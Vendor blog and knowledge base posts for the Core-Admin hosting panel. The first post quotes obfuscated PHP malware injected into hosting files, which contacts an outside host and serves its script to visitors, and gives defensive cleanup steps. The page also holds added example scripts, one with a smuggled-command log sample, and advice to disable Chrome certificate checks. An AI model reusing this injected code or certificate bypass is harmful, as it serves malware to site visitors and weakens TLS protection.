Blog

KB: 21012014-001: Fixing webhosting php-hash-update attack

Symptom

Core-Admin has reported unauthorized changes to your hosting files, and on inspecting them you find that they were updated with something similar to:

<?php
#41f893#
error_reporting(0); ini_set('display_errors',0); $wp_wefl08872 = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Gecko|MSIE/i', $wp_wefl08872) && !preg_match ('/bot/i', $wp_wefl08872))){
$wp_wefl0908872="http://"."http"."href".".com/href"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_wefl08872);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_wefl0908872);
curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_08872wefl = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_08872wefl,1,3) === 'scr' ){ echo $wp_08872wefl; }
#/41f893#
?>

Affected releases

All

Background

This attack is carried out through the FTP server: the attacker downloads the original file and then uploads it again with the additional content. In essence, the attack adds content to your files without changing the rest.

This attack is possible because the password was stolen from a compromised machine infected with a virus or malware that looks for stored passwords at known locations, or because an FTP session was opened with this password over an insecure connection (such as public Wi-Fi).

Solution

You have to find which files were updated in order to remove the added content. You must also reset the password of every FTP account that was used to run this attack. Fortunately, Core-Admin already includes an application that automates these tasks.

Follow these instructions to clean up and reset all required FTP accounts:

  1. Run the following command as root in a server’s shell:
    >> crad-find-and-fix-phphash-attack.pyc
  2. Once finished, it will report which files were updated and which FTP accounts were compromised. Now, run the tool again asking it to fix this:
    >> crad-find-and-fix-phphash-attack.pyc --clean --change-ftp-accounts
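To show what finding and removing the marker-delimited block from the Symptom section involves, here is an added example (not Core-Admin's crad-find-and-fix-phphash-attack tool and not code from the original page). It assumes the marker is always six hex digits as in the sample; `strip_injection`, `scan_tree` and the `.infected` backup suffix are hypothetical names.

```python
import re
import sys
from pathlib import Path

# Constructed sample: an infected file in the shape shown under "Symptom".
SAMPLE = (b'<?php\n#41f893#\nerror_reporting(0); /* injected body */\n'
          b'#/41f893#\n?>\n<?php echo "site"; ?>\n')

# "#<id>#" ... "#/<id>#" with a matching id. Assumption: the id is always six
# lowercase hex digits, as in the sample; adjust if your copies differ.
BLOCK = re.compile(rb"#([0-9a-f]{6})#.*?#/\1#\s*", re.DOTALL)
# PHP island left empty once the block is gone ("<?php ?>").
EMPTY_PHP = re.compile(rb"<\?php\s*\?>\s*")


def strip_injection(data):
    """Return (cleaned bytes, list of marker ids found) for one file."""
    ids = [m.group(1).decode() for m in BLOCK.finditer(data)]
    if not ids:
        return data, []
    return EMPTY_PHP.sub(b"", BLOCK.sub(b"", data)), ids


def scan_tree(root, clean=False):
    """Map each infected *.php file under root to its marker ids.

    Files are rewritten only when clean=True; the infected original is kept
    beside it as <name>.infected so it can be examined later.
    """
    report = {}
    for path in sorted(Path(root).rglob("*.php")):
        original = path.read_bytes()
        cleaned, ids = strip_injection(original)
        if ids:
            report[str(path)] = ids
            if clean:
                path.with_name(path.name + ".infected").write_bytes(original)
                path.write_bytes(cleaned)
    return report


if __name__ == "__main__":
    # Report only; pass the hosting root as the first argument.
    for name, ids in scan_tree(sys.argv[1] if len(sys.argv) > 1 else ".").items():
        print(name, ",".join(ids))
```

Cleaning the files does not close the entry point: the FTP passwords still have to be reset as described above.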

Posted in: KB, Security


ANN: Core-Admin 1.0.32-3207 ready for download!

A new Core-Admin stable release is available with lots of features and corrections. Here is a brief description:

  1. NEW PLATFORMS: Ubuntu Precise Pangolin LTS 12.04.3 and Debian Wheezy 7.0 are now supported. See all our supported platforms here:
    http://www.core-admin.com/portal/get-it/supported-platforms
  2. IMPROVEMENTS: Dojo 1.6.2 is now the default engine for the web-client. Applied several updates to improve the interface experience. The installer is now available in English and Spanish. App installers are now able to show a progress window with task completion (fully programmable and available to developers creating core-admin applications), and many more; see the change-log.
  3. DEVELOPMENT: released core-admin app-builder to allow creating checkers and new applications on top of Core-Admin.
  4. GENERAL+SECURITY: many fixes and security updates were applied to this release. See log for more details.

See all details at the release note.

Posted in: Core-Admin, Releases


KB: 05112013-001: Webhosting management fails to add a new hosting reporting an error about quotas

Symptom

When trying to create a hosting inside Webhosting management, it fails with an error similar to:

setquota: Cannot open quotafile /home/aquota.user: Permission denied
setquota: Not all specified mountpoints are using quota.

Affected releases

All

Solution

Restart the quota system. To do so you can use one of the following methods:

  1. Run the following command if you have easy access to a root shell on the server:
    >> /etc/init.d/quota restart
  2. You can restart the service using “Process and services viewer”, by selecting “quota” service under unmanaged services. After selecting, use the restart option available.

Posted in: Core-Admin, Debian, Debian Lenny, Debian Squeeze, Debian Wheezy, KB


KB: 04112013-001: Mail admin installer fails because libmail-sender-perl is not found

Symptom

When the Mail admin installer is launched, it stops and fails, reporting that the libmail-sender-perl package isn’t found.

Affected releases

Debian Lenny (5.0), Debian Squeeze (6.0), Debian Wheezy (7.0)

Solution

  1. Update your /etc/apt/sources.list to include the “non-free” declaration in the default source of packages. A working example should look like:
    deb http://ftp.es.debian.org/debian/ squeeze main non-free
  2. After that, restart the installer again.

 

Posted in: Debian, Debian Lenny, Debian Squeeze, Debian Wheezy, KB


How to see my Core-Admin license and check its status?

Checking your current Core-Admin license codes

To see your current Core-Admin license codes, you must be logged into Core-Admin as platform admin, and then click on the top menu System → License manager.

This will launch the License manager application. Then click on “Summary” and it will display current license status.

Triggering a license codes check

If for whatever reason your Core-Admin server wasn’t able to check current installed license codes, you can trigger a check by clicking on the “Check license now” button which appears inside the Summary section.

Managing currently installed license codes

Under the “License codes” section (on the left side tree), you’ll find currently installed license codes. There, you’ll be able to list license codes and to remove them.

Adding new license code

To add a new license code, just click on Options (located at the top toolbar) → Add license code. Then enter the license code and wait for server confirmation.

Posted in: Licensing


Core-Admin Web Edition: what is included in the license?

A single Core-Admin Web Edition subscription license includes the following general items which are at the same time the elements that are allowed:

  • Support for running a central server and the web interface (turbulence and core-admin central server)
  • Support to accept one agent connecting to this server. More agents can be added by acquiring more Core-Admin Single Agent or similar subscription licenses (see options).
  • Support to create any kind of core-admin users and delegating permissions to them.  This is crucial for any situation where users must have low level permissions to administrate only those objects that they need.
  • Support to run any number of the Core-Admin base applications on any connected server.
  • Support to run one instance of Webhosting management, Mail Admin, Dns Admin and Shared FTP manager.
  • Support to get updates (security, critical and upgrades) at any time, without any limit.
  • Support to create any number of objects without any limit (mail plans, webhosting, etc..).

There are other elements that are allowed by this subscription license but these are the most relevant. Contact us if you have any additional questions.

Posted in: Core-Admin Web Edition, Licensing


Core-Admin Free Web Edition: what is allowed commercially with this license?

You can use the Core-Admin Free Web Edition subscription license for any commercial or private use, even for selling hosting services using Core-Admin. The only difference is that it limits the number of objects (web hostings, mail plans) and it also places some restrictions on the kind of core-admin users you can create (to name some).

To see more details about differences between Core-Admin Web Edition and its Free Edition, see the following page: http://www.core-admin.com/portal/get-it/web-edition

In the case you have a private or corporate server and you want to manage your organization’s web pages with Core-Admin, and without considering the purpose of those web pages, then you can use Core-Admin Free Web Edition.

Posted in: Core-Admin Web Edition, Licensing


Core-Admin Web Edition: what license subscription do I need for several servers?

It depends on the kind of setup you want to install. First you have to cover the base installation to have a Core-Admin central server where to join agents. Let’s see this first:

  • Independent servers: if you want to separate those servers so that each has its own independent administration panel, you need one Core-Admin Web Edition subscription license for each server.
  • One panel, various servers: in the case you want to have a single panel controlling these servers, you need a single Core-Admin Web Edition subscription and one Core-Admin Single Agent subscription for each server you want to connect.

Now, you have to consider applications you want to run on those servers that are joined to the Core-Admin server:

  • In the case you want to have separate services in each server, for example, one server runs web services, other mail services and other dns services, you don’t need anything else because Core-Admin Web Edition includes support to run a single instance of all of those applications.
  • In the case you want additional applications you need to acquire a Core-Admin Standard Application subscription and indicate during the purchase process which application you need.
  • In the case you want all servers connected to a single central server but you still need to run all applications (dns, mail, web…) in all of them, it is cheaper to acquire one Core-Admin Web Edition subscription license for each of those servers instead of acquiring separate applications.

Posted in: Core-Admin Web Edition, Licensing


Connecting to your Core-Admin web panel

Introduction: how to connect to Core-Admin server

Core-Admin provides a web panel interface to administrate and monitor services, applications and machines. To get a real-time interaction between users and these machines’ services, Core-Admin takes advantage of  BEEP (Block Extensible Exchange Protocol http://www.beepcore.org).

However, BEEP is based on TCP/IP and this protocol is not available “as is” in current web browsers, and it is not likely to be in the near future. For that reason, Core-Admin uses two methods (and there may be more in the future) to enable TCP/IP availability (in fact, something similar), so your browser can talk “BEEP” with the central server it is trying to connect to.

These methods, both available through jsVortex, are the following:

  • WebSocket: if the browser has support for this new technology, it will be the default choice.
  • JavaSocketConnector: otherwise, Core-Admin will use a java applet to enable TCP/IP access.

All modern browsers (those coming out since 2010), including Internet Explorer 8 and so forth, include support for JavaSocketConnector. In fact, any browser that has support for Java will have support for JavaSocketConnector.

Steps to connect

By default, your Core-Admin web-client will try to connect through WebSocket (this is done automatically). In the case it is not possible (because WebSocket isn’t detected), JavaSocketConnector will be enabled. At any time, you can force the use of a particular interface by clicking on the link at the bottom left part of the interface:

In the case your browser does not support WebSocket, Core-Admin will detect it and will enable the JavaSocketConnector interface without requiring you to pay attention to this detail.

You’ll see this is happening when your core-admin is loaded from a URL ending in: /index-java.html

In both cases, using WebSocket or JavaSocketConnector, your core-admin client will attempt to connect through the 602/TCP port. Therefore, be sure there is no firewall blocking that internet connection.

Connecting to your core-admin server without a signed certificate while using WebSocket

If your Core-Admin server doesn’t have a TLS/SSL signed certificate (signed by a known party), then it is possible you’ll receive the following error when connecting using WebSocket (failed to connect to wss://):

Assuming your BEEP server is there (because that error may also be caused by your server simply being down), this happens because the browser detects that the certificate isn’t signed or cannot be trusted. Users have complained about browsers not providing a dialog to accept these connections; in any case, the current options to solve this problem are:

  • To get a TLS/SSL certificate signed by a known party. It is by far the easiest solution and it is also the recommended way in the case you expect to provide access to general users (for example, for webhosting services), but it involves a cost for signing the certificate. Core-Admin users have special prices for certificate signing, see next: core-admin certificates.
  • To use JavaSocketConnector, which doesn’t suffer from this problem.
  • To create a browser exception to allow this connection.

Creating a browser exception to enable WebSocket without certificate

Next, we will show you how to add an exception for various web browsers:

  • Google Chrome: create a shortcut which runs the following command:
    >> google-chrome --ignore-certificate-errors --user-data-dir=/tmp/core-admin
  • Mozilla Firefox: get into the certificate management section and add an exception. For that, select Edit -> Preferences -> Advanced -> Cyphering -> View certificates -> Add exception. Inside, add the address of the core-admin server you are trying to connect to, for example: wss://core-admin.servidor.com:602
    It is really important to pass the right server name (the one provided in the installation) to make it match with the URL used for access.

Core-admin browsers compatibility table

The web browsers currently supported by Core-Admin are shown next, with the versions and connection method available for each of them:

  • WebSocket (RFC6455) support: Google Chrome 16.0 or higher; Firefox 11.0 or higher; Safari 6.0 or higher; Internet Explorer 10 or higher; Opera 12.0 or higher
  • Support for JavaSocketConnector (requires java applet): Google Chrome 13.0 or higher; Firefox 2.0 or higher; Safari 5.0 or higher; Internet Explorer 8 or higher; Opera 8.0 or higher
  • Requires signed certificate when using WebSocket?
  • Can be added an exception while using WebSocket?

 

Posted in: Certificates, Core-Admin, JavaSocketConnector, WebSocket

How to block IPs and how to manage currently blocked IPs

Blocking IPs with Core-Admin

To be able to manage currently blocked IPs you need a machine administrator or platform admin user.

Once you sign in to core-admin, select the machine you want to manage from the left side panel (Machines) and, after the machine administrator panel shows up, click on “Ip blocker (2)”.

Inside that application, the currently blocked IPs section is on the left side. Click on “Blacklisted IPs” (3).

After clicking, the list of currently blocked IPs on this specific server will appear, along with other information about the kind of blocking applied and why. To add a new IP to block, click on “Add blacklisted ip” (4) on the toolbar located at the top of the list:

This will show a new form where we have to indicate the IP to block (5).

It is also recommended to write a comment about the blocking (the reason or the event that caused it) so you can better identify it later.

We also have to choose between permanent or temporal blocking (6). If you select temporal blocking, we have to indicate for how long we want it to be blocked. If you click on the   icon, you’ll see various references to time equivalences.

Then click on “Add a new Blacklisted ip” (7) at the bottom to save changes.

 

Removing a blocked IP from Core-Admin

To remove a blocked IP we have to click on the Blacklisted IPs (3) section (on the left panel) as we did in the previous section.

Then we have to click on the blacklisted IP record we want to remove (4):

After that, a new window will show up allowing us to manage this blocked IP record.

Then we have to click on “Remove blacklisted IP” (5).

 

Adding IPs to the blocking exception list with Core-Admin

Another useful option available in the ip blocker tool is the blocking exception. This allows us to manage which IPs shouldn’t be blocked automatically by security processes that are automatically activated by Core-Admin or by applications using its blocking services.

Adding a blocking exception is pretty straightforward. Once we have launched the IP blocker application (steps 1 and 2), we have to click on “Unblockable IPs” (3) and then click on “Add whitelisted ip” (4).

A new window will appear where we can fill in the details about the IP that mustn’t be blocked even when requested.

We provide the IP at (5).

It is strongly recommended to provide a comment or an event id to better identify this record later.

We also indicate the kind of record: permanent or temporal (6).

Once finished, click on  “Add a new whitelisted Ip” (7).

 

IP blocker integration with your scripts and applications: commands

IP blocker application includes a shell script and a Python interface that allows other applications to trigger blocking operations in a manner that is consistent with the platform and with the advantage that all these blocking operations can be managed through the core-admin interface.

Here is the list of commands that can be used:

  • Show current blocking list
    >> crad-ip-blocker.py -l
  • Add a temporal blocking for 3600 seconds
    >> crad-ip-blocker.py -a IP temporal 3600 "Why it was blocked"
  • Add a permanent block
    >> crad-ip-blocker.py -a IP permanent
  • Remove a blocking
    • First show current rules:
      >> crad-ip-blocker.py -l
    • Then, choose one (picking the id) and then run:
      >> crad-ip-blocker.py -r ID
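As an added example (not part of Core-Admin or the original page), the script below turns repeated failed FTP logins into the temporal-block command listed above. The vsftpd-style log lines are constructed, and `block_commands`, its threshold and the `never_block` list are hypothetical; only the `-a IP temporal SECONDS "comment"` form comes from this page.

```python
import ipaddress
import re
from collections import Counter

# Constructed sample lines in vsftpd log style (assumption: your FTP server
# records failed logins in a comparable 'FAIL LOGIN: Client "..."' form).
SAMPLE_LOG = [
    'Mon Jan 20 10:00:01 2014 [pid 811] [web1] FAIL LOGIN: Client "203.0.113.7"',
    'Mon Jan 20 10:00:03 2014 [pid 812] [web1] FAIL LOGIN: Client "::ffff:203.0.113.7"',
    'Mon Jan 20 10:00:05 2014 [pid 813] [web2] FAIL LOGIN: Client "203.0.113.7"',
    'Mon Jan 20 10:01:00 2014 [pid 820] [web1] FAIL LOGIN: Client "198.51.100.9"',
    'Mon Jan 20 10:02:00 2014 [pid 830] [web1] OK LOGIN: Client "192.0.2.10"',
    'Mon Jan 20 10:02:09 2014 [pid 831] [x] FAIL LOGIN: Client "1.2.3.4; reboot"',
] + ['Mon Jan 20 10:03:00 2014 [pid 840] [web3] FAIL LOGIN: Client "192.0.2.10"'] * 3

FAIL = re.compile(r'FAIL LOGIN: Client "([^"]+)"')


def normalise(text):
    """Return a canonical IP string, or None if text is not an IP address."""
    try:
        ip = ipaddress.ip_address(text)
    except ValueError:
        return None  # log content is attacker-influenced: never pass it on raw
    if ip.version == 6 and ip.ipv4_mapped:
        ip = ip.ipv4_mapped  # "::ffff:203.0.113.7" counts as 203.0.113.7
    return str(ip)


def block_commands(lines, threshold=3, seconds=3600, never_block=()):
    """Build one crad-ip-blocker.py argv list per IP reaching the threshold."""
    counts = Counter()
    for line in lines:
        match = FAIL.search(line)
        ip = normalise(match.group(1)) if match else None
        if ip:
            counts[ip] += 1
    skip = {normalise(a) for a in never_block}
    return [
        ["crad-ip-blocker.py", "-a", ip, "temporal", str(seconds),
         "%d failed FTP logins" % n]
        for ip, n in sorted(counts.items())
        if n >= threshold and ip not in skip
    ]


if __name__ == "__main__":
    for argv in block_commands(SAMPLE_LOG, never_block=["192.0.2.10"]):
        print(argv)  # on the server: subprocess.run(argv, check=True), no shell
```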

 

Contact

Feel free to contact us if you have questions or doubts while using Core-Admin. Use the following contact information to reach us.

 

 

Posted in: Core-Admin, Security
